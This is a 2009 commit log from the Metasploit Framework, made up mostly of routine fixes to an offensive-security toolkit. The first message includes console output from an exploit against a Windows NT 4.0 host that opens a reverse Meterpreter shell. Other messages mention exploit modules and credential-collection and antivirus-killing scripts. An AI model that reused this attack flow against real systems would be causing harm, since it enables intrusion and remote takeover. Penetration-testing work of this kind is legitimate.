HD Moore
aa09862813
Fixes #401 . Ends up Windows NT doesn't like DCERPC requests to be partially written by SMB writes, this patches the min write size to be at least as big as the DCERPC request. The DCERPC::max_frag_size parameter can still be used for more evasion.
...
[*] Started reverse handler
[*] Detected a Windows NT 4.0 target
[*] Adjusting the SMB/DCERPC parameters for Windows NT
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.0.128[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.0.128[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.128:1485)
meterpreter > sysinfo
Computer: VMNT4
OS : Windows NT 4.0 (Build 1381, Service Pack 6).
Arch : x86
Language: en_US
git-svn-id: file:///home/svn/framework3/trunk@7296 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-28 16:37:18 +00:00
HD Moore
bffb98ba9f
Add XP SP3 target for WarFTPD.
...
git-svn-id: file:///home/svn/framework3/trunk@7295 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-28 10:29:41 +00:00
HD Moore
9141d4e967
Condense the lorcon2 each_packet method, the queue isnt necessary after testing
...
git-svn-id: file:///home/svn/framework3/trunk@7294 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-28 01:41:17 +00:00
HD Moore
31276e1626
Fixes #427 . Finally found a solution that works for 1.8 and 1.9, this allows lorcon modules to run in the background or foreground and handle interrupts from the console gracefully. Its still a hack
...
git-svn-id: file:///home/svn/framework3/trunk@7293 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-28 00:19:17 +00:00
HD Moore
7b22b2cc04
Mostly working codebase, still hanging on some instances, depends on latest svn of lorcon2. See #427
...
git-svn-id: file:///home/svn/framework3/trunk@7292 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-27 20:13:20 +00:00
HD Moore
5234fe8ff8
Fixes 416. Adds the rm/del commands to meterpreter, fixes build problems triggered by the POSIX code merge
...
git-svn-id: file:///home/svn/framework3/trunk@7291 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-27 02:31:07 +00:00
HD Moore
276a3f8052
Use _WIN32 instead of __WIN32__ to be consistent
...
git-svn-id: file:///home/svn/framework3/trunk@7290 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-27 01:13:35 +00:00
HD Moore
6dcffd0373
Catch attempts to migrate to a name vs a pid
...
git-svn-id: file:///home/svn/framework3/trunk@7289 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-27 00:56:56 +00:00
HD Moore
8d8bc45dfd
Adds a shortcut for getting a shell (execute -f cmd -c -i -H) is now just "shell"
...
git-svn-id: file:///home/svn/framework3/trunk@7288 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-27 00:47:00 +00:00
HD Moore
3b99a513ec
Fixes #352 and fixes #350 . Can no longer reproduce memory corruption or packet loss with this code
...
git-svn-id: file:///home/svn/framework3/trunk@7287 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 22:49:43 +00:00
HD Moore
b662d044a6
Fixes #412 . Still an issue with lorcon not yielding back when there is no traffic, but this is a different bug
...
git-svn-id: file:///home/svn/framework3/trunk@7286 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 22:36:24 +00:00
HD Moore
ddeb80e0da
See #412 . Fix compile warnings and errors on 1.9, still needs testing
...
git-svn-id: file:///home/svn/framework3/trunk@7285 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 21:09:40 +00:00
HD Moore
e1559b1ab4
Fixes #408 . Trims leads spaces, adds trailing space, prevents line wipe when tab completing is done
...
git-svn-id: file:///home/svn/framework3/trunk@7284 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 20:33:55 +00:00
HD Moore
5eed9deb2d
Adds the joomla TinyMCE file upload exploit from spinbad.
...
git-svn-id: file:///home/svn/framework3/trunk@7283 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 20:00:39 +00:00
HD Moore
5e137e92fd
Fixes #381 . To scan for TLSv1 only services, set SSLVersion TLS1
...
git-svn-id: file:///home/svn/framework3/trunk@7282 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 19:48:15 +00:00
HD Moore
478a7ce8ab
Fixes #410 . Calls the real _close function, not the best solution, but will do until we fix the IO::Stream override.
...
git-svn-id: file:///home/svn/framework3/trunk@7281 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 19:06:50 +00:00
HD Moore
91dd38550f
Fixes #398 . Allow globals to override local defaults, but fallthrough to local defaults if no global or local is set
...
git-svn-id: file:///home/svn/framework3/trunk@7280 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 18:48:06 +00:00
HD Moore
bbb85ceb2c
Updated userguide and latex file to match copyright and links
...
git-svn-id: file:///home/svn/framework3/trunk@7279 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 18:04:49 +00:00
HD Moore
32f7d742b3
Fixes #328 . Crafty little bug -- if asm was "" vs nil, the stage would try to compile as metasm instead of using the raw payload.
...
git-svn-id: file:///home/svn/framework3/trunk@7278 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 17:44:43 +00:00
HD Moore
e7638ef887
Fixes #397 . Webrick requires :BindAddress but msfweb only passed in :Host, likely an api change was missed during a rails upgrade.
...
git-svn-id: file:///home/svn/framework3/trunk@7277 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 17:33:05 +00:00
James Lee
0a6bb91cb9
keywords
...
git-svn-id: file:///home/svn/framework3/trunk@7276 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 15:14:28 +00:00
James Lee
127b5f8608
keywords, maybe?
...
git-svn-id: file:///home/svn/framework3/trunk@7275 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 15:12:05 +00:00
Mario Ceballos
3d3e031690
fixes ticket 419
...
git-svn-id: file:///home/svn/framework3/trunk@7274 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 11:21:23 +00:00
James Lee
232c218475
raise instead of return
...
git-svn-id: file:///home/svn/framework3/trunk@7273 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 06:02:14 +00:00
James Lee
cf25726236
killav usage
...
git-svn-id: file:///home/svn/framework3/trunk@7272 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 05:50:02 +00:00
James Lee
adece18fd5
keylogrecorder usage; spacing; don't try to migrate into the process we're currently running in
...
git-svn-id: file:///home/svn/framework3/trunk@7271 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 05:26:08 +00:00
James Lee
6e85ba4393
hostedit usage
...
git-svn-id: file:///home/svn/framework3/trunk@7270 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:56:55 +00:00
James Lee
198bf48735
gettelnet usage and spacing
...
git-svn-id: file:///home/svn/framework3/trunk@7269 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:49:01 +00:00
James Lee
bf48e39532
get_local_subnets usage
...
git-svn-id: file:///home/svn/framework3/trunk@7268 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:43:59 +00:00
James Lee
0a074b294f
getgui option parsing; usage; spacing
...
git-svn-id: file:///home/svn/framework3/trunk@7267 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:41:51 +00:00
HD Moore
7d7c565a37
Merge in the POSIX stdapi extension, still some work left to finish
...
git-svn-id: file:///home/svn/framework3/trunk@7266 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:34:20 +00:00
James Lee
1aa9d1b662
fix some spacing; better option parsing; don't write a file if we don't have to
...
git-svn-id: file:///home/svn/framework3/trunk@7265 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:33:53 +00:00
HD Moore
6da0013b91
See #378 . Additional fix for batch mode
...
git-svn-id: file:///home/svn/framework3/trunk@7264 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 03:54:44 +00:00
HD Moore
8328bf654b
Fixes #358 . Adds progress reporting at 10% intervals (min granularity is thread count)
...
git-svn-id: file:///home/svn/framework3/trunk@7263 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 03:49:07 +00:00
et
7a24a5495e
Fix #414 globaly defined datastore values are now rewriten before RHOSTS, RPORT, SSL are set. Support of hostnames instead of ips. Minor version changes
...
git-svn-id: file:///home/svn/framework3/trunk@7262 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 22:20:59 +00:00
HD Moore
6dfaaef295
Remove the bogus puts()
...
git-svn-id: file:///home/svn/framework3/trunk@7261 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 21:55:59 +00:00
Mario Ceballos
131adc4c3a
fixed cve reference number.
...
git-svn-id: file:///home/svn/framework3/trunk@7260 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 21:19:27 +00:00
James Lee
cadb1c9337
add -h and usage to get_local_subnets
...
git-svn-id: file:///home/svn/framework3/trunk@7259 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 21:03:42 +00:00
HD Moore
b0a38b1cfa
Fix bad uses of puts() and add raise Rex::Script::Completed where appropriate. These still need a major overhaul to fix tab indents and other problems
...
git-svn-id: file:///home/svn/framework3/trunk@7258 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 20:57:23 +00:00
HD Moore
f9f690b0e7
Updated prefetch script and creation of Rex::Script::Completed as a clean way to exit meterpreter scripts
...
git-svn-id: file:///home/svn/framework3/trunk@7257 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 20:50:07 +00:00
HD Moore
e94360f7cf
The script now downloads this as needed
...
git-svn-id: file:///home/svn/framework3/trunk@7256 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 20:47:16 +00:00
James Lee
e93995fdab
add -h to credcollect
...
git-svn-id: file:///home/svn/framework3/trunk@7255 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 19:52:40 +00:00
James Lee
5fd8dc748a
add -h and usage to checkvm
...
git-svn-id: file:///home/svn/framework3/trunk@7254 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 18:53:43 +00:00
James Lee
134c8d75d7
better option handling, beginnings of universal -h support
...
git-svn-id: file:///home/svn/framework3/trunk@7253 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 18:36:47 +00:00
James Lee
e836e6373a
add Id to scripts; remove shebang since they should never run from commandline
...
git-svn-id: file:///home/svn/framework3/trunk@7252 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 18:04:39 +00:00
James Lee
daed2d5d8f
spaces --> tabs
...
git-svn-id: file:///home/svn/framework3/trunk@7251 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:56:01 +00:00
James Lee
cdc042d49b
keywords
...
git-svn-id: file:///home/svn/framework3/trunk@7250 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:45:34 +00:00
James Lee
15f8538e1c
spaces --> tabs
...
git-svn-id: file:///home/svn/framework3/trunk@7249 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:44:53 +00:00
HD Moore
e3f68f2639
Another large number of warnings fixed by Yoann Guillot
...
git-svn-id: file:///home/svn/framework3/trunk@7248 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:18:23 +00:00
HD Moore
9904861e94
Prevent rails from overloading require, another big speed boost from Yoann, and it looks like we can avoid it
...
git-svn-id: file:///home/svn/framework3/trunk@7247 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:07:48 +00:00